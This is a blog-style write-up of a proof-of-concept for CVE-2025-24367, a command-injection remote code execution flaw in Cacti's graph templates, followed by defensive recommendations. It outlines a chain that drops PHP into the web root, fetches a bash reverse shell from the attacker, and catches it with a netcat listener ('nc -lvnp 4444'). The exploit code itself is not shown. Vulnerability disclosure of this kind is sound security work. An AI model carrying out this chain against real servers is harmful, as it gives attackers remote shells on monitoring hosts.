Overview
I recently developed a proof-of-concept exploit for CVE-2025-24367, an authenticated remote code execution (RCE) vulnerability affecting Cacti.
This issue stems from insufficient input sanitization in graph template handling. Under certain conditions, user-controlled fields are passed into an RRDTool command context without proper filtering, allowing command injection.
While authentication is required, the vulnerability enables a valid user to escalate impact significantly by writing and executing arbitrary PHP code on the server.
This PoC was developed strictly for lab environments and authorized testing.
Vulnerability Summary
- Product: Cacti
- CVE: CVE-2025-24367
- Type: Authenticated Remote Code Execution
- Attack Vector: Graph template injection (RRDTool context)
- Authentication Required: Yes
The root cause lies in unsafe handling of user-supplied input within graph template fields. Because these fields influence RRDTool command execution, improper sanitization opens the door to command injection.
Exploit Concept
The exploit leverages the “Unix – Logged in Users” graph template (commonly template ID 226).
1️⃣ Payload Upload
A malicious modification of the graph template causes Cacti to:
- Write a PHP file into the web root
- That PHP file downloads a secondary bash reverse shell payload from the attacker
2️⃣ Payload Execution
The template is triggered again, causing:
- Execution of the dropped PHP file
- Retrieval and execution of the bash reverse shell
- A connection back to the attacker’s listener
A temporary HTTP server is used to host the payload during exploitation.
Technical Breakdown
At a high level, the vulnerability exists because:
- User-controlled graph template fields are inserted into RRDTool command strings.
- The application does not adequately sanitize or escape shell metacharacters.
- This allows command injection within the RRDTool execution context.
Because Cacti often runs with elevated permissions, the impact can be significant.
Lab Demonstration Workflow
- Start a listener:
nc -lvnp 4444 - Run the exploit:
python3 exploit.py - Provide:
- Base URL (without
/cacti/) - Valid credentials
- Attacker IP and port
- Base URL (without
If successful, a reverse shell connects back to the listener.
Security Impact
Although authentication is required, this vulnerability is high-risk because:
- Cacti is often internally exposed.
- Monitoring systems frequently have elevated system access.
- Authenticated user accounts may be low-privileged or shared.
- Lateral movement becomes trivial once code execution is achieved.
Defensive Recommendations
If you are running Cacti:
- Update immediately to a patched version once available.
- Restrict access to Cacti behind VPN or IP allow-listing.
- Monitor for unexpected changes to graph templates.
- Audit web root directories for suspicious PHP files.
- Restrict OS-level permissions for the web server user.
This PoC highlights how seemingly harmless configuration features — like graph templates — can become RCE primitives when sanitization is insufficient.
Authenticated vulnerabilities are often underestimated, but in real-world environments, they can be just as damaging as unauthenticated exploits.